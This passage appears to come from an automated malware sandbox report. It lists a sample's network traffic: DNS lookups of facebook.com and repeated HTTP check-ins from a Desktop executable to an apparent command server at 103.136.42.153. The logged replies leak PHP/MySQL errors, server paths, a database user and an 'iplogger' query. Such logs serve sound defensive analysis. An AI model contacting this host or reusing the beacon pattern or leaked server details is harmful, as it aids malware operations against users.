Oct 7, 2022 16:00:15.844909906 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844979048 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.844985008 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.845009089 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.845274925 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.845752001 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.845809937 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.845829010 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.845891953 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.846692085 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.846752882 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.846776962 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.846827030 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.846853971 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.847532034 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.847606897 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.847656012 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.847665071 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.847706079 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.848068953 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.848149061 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.848153114 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.848175049 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.848251104 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.848293066 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.848301888 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.848337889 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.848892927 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.848959923 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.848973036 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.849020004 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.849680901 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.849731922 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.849766016 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.849811077 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.849842072 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.849886894 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.850395918 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.850456953 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.850472927 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.850517035 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.858376980 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858448029 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.858486891 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858566046 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.858568907 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858593941 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858684063 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858731031 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.858740091 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858771086 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858778954 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.858791113 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858899117 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858952999 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.858961105 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.858999014 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.859548092 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.859617949 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.859635115 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.859694004 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.859710932 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.859756947 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.860373974 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.860532045 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.860594988 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.860608101 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.860625982 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.860678911 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.860694885 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.860719919 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.860806942 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.861313105 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.861387014 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.861432076 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.861484051 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.861835957 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.861907005 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.861960888 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.862023115 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.862076998 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.862138033 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.862193108 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.862251043 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.862761021 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.862817049 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.862976074 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863105059 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863131046 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863140106 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863154888 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863176107 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863219976 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863233089 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863289118 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863632917 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863691092 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863713026 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863765001 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863822937 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863877058 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.863898993 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.863945007 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.864490032 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.864541054 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.864572048 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.864620924 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.864650011 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.864696980 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.864721060 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.864799023 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.930525064 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:26.663692951 CEST	49713	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:26.664335012 CEST	49721	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:26.694343090 CEST	80	49721	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:26.694385052 CEST	80	49713	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:26.694596052 CEST	49713	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:26.694716930 CEST	49721	80	192.168.2.5	103.136.42.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2022 15:58:24.145931005 CEST	60841	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:58:24.167756081 CEST	53	60841	8.8.8.8	192.168.2.5
Oct 7, 2022 15:58:40.342859983 CEST	61893	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:58:40.364459991 CEST	53	61893	8.8.8.8	192.168.2.5
Oct 7, 2022 15:58:45.821595907 CEST	60649	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:58:45.839490891 CEST	53	60649	8.8.8.8	192.168.2.5
Oct 7, 2022 15:59:00.296178102 CEST	51441	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:59:00.315536022 CEST	53	51441	8.8.8.8	192.168.2.5
Oct 7, 2022 15:59:18.557454109 CEST	49724	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:59:18.576673985 CEST	53	49724	8.8.8.8	192.168.2.5
Oct 7, 2022 15:59:25.249069929 CEST	61452	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:59:25.270863056 CEST	53	61452	8.8.8.8	192.168.2.5
Oct 7, 2022 15:59:28.311273098 CEST	65323	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:59:28.332257986 CEST	53	65323	8.8.8.8	192.168.2.5
Oct 7, 2022 15:59:47.668946981 CEST	51484	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:59:47.688833952 CEST	53	51484	8.8.8.8	192.168.2.5
Oct 7, 2022 15:59:49.605001926 CEST	63446	53	192.168.2.5	8.8.8.8
Oct 7, 2022 15:59:49.624478102 CEST	53	63446	8.8.8.8	192.168.2.5
Oct 7, 2022 16:00:15.153912067 CEST	56751	53	192.168.2.5	8.8.8.8
Oct 7, 2022 16:00:15.171593904 CEST	53	56751	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2022 15:58:24.145931005 CEST	192.168.2.5	8.8.8.8	0x3a3b	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:58:40.342859983 CEST	192.168.2.5	8.8.8.8	0x988d	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:58:45.821595907 CEST	192.168.2.5	8.8.8.8	0xfa05	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:00.296178102 CEST	192.168.2.5	8.8.8.8	0x3a12	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:18.557454109 CEST	192.168.2.5	8.8.8.8	0xae2	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:25.249069929 CEST	192.168.2.5	8.8.8.8	0xe8a3	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:28.311273098 CEST	192.168.2.5	8.8.8.8	0x160	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:47.668946981 CEST	192.168.2.5	8.8.8.8	0x6b7	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:49.605001926 CEST	192.168.2.5	8.8.8.8	0x6f8b	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Oct 7, 2022 16:00:15.153912067 CEST	192.168.2.5	8.8.8.8	0x4368	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2022 15:58:24.167756081 CEST	8.8.8.8	192.168.2.5	0x3a3b	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:58:24.167756081 CEST	8.8.8.8	192.168.2.5	0x3a3b	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:58:40.364459991 CEST	8.8.8.8	192.168.2.5	0x988d	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:58:40.364459991 CEST	8.8.8.8	192.168.2.5	0x988d	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:58:45.839490891 CEST	8.8.8.8	192.168.2.5	0xfa05	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:58:45.839490891 CEST	8.8.8.8	192.168.2.5	0xfa05	No error (0)	star-mini.c10r.facebook.com		157.240.20.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:00.315536022 CEST	8.8.8.8	192.168.2.5	0x3a12	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:59:00.315536022 CEST	8.8.8.8	192.168.2.5	0x3a12	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:18.576673985 CEST	8.8.8.8	192.168.2.5	0xae2	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:59:18.576673985 CEST	8.8.8.8	192.168.2.5	0xae2	No error (0)	star-mini.c10r.facebook.com		31.13.92.36	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:25.270863056 CEST	8.8.8.8	192.168.2.5	0xe8a3	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:59:25.270863056 CEST	8.8.8.8	192.168.2.5	0xe8a3	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:28.332257986 CEST	8.8.8.8	192.168.2.5	0x160	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:59:28.332257986 CEST	8.8.8.8	192.168.2.5	0x160	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:47.688833952 CEST	8.8.8.8	192.168.2.5	0x6b7	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:59:47.688833952 CEST	8.8.8.8	192.168.2.5	0x6b7	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 15:59:49.624478102 CEST	8.8.8.8	192.168.2.5	0x6f8b	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 15:59:49.624478102 CEST	8.8.8.8	192.168.2.5	0x6f8b	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false
Oct 7, 2022 16:00:15.171593904 CEST	8.8.8.8	192.168.2.5	0x4368	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2022 16:00:15.171593904 CEST	8.8.8.8	192.168.2.5	0x4368	No error (0)	star-mini.c10r.facebook.com		185.60.216.35	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.facebook.com

103.136.42.153

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49701	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49703	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49700	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:58:23.503640890 CEST	93	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:58:23.534363031 CEST	95	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49702	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:58:40.168322086 CEST	131	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:58:40.199541092 CEST	132	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 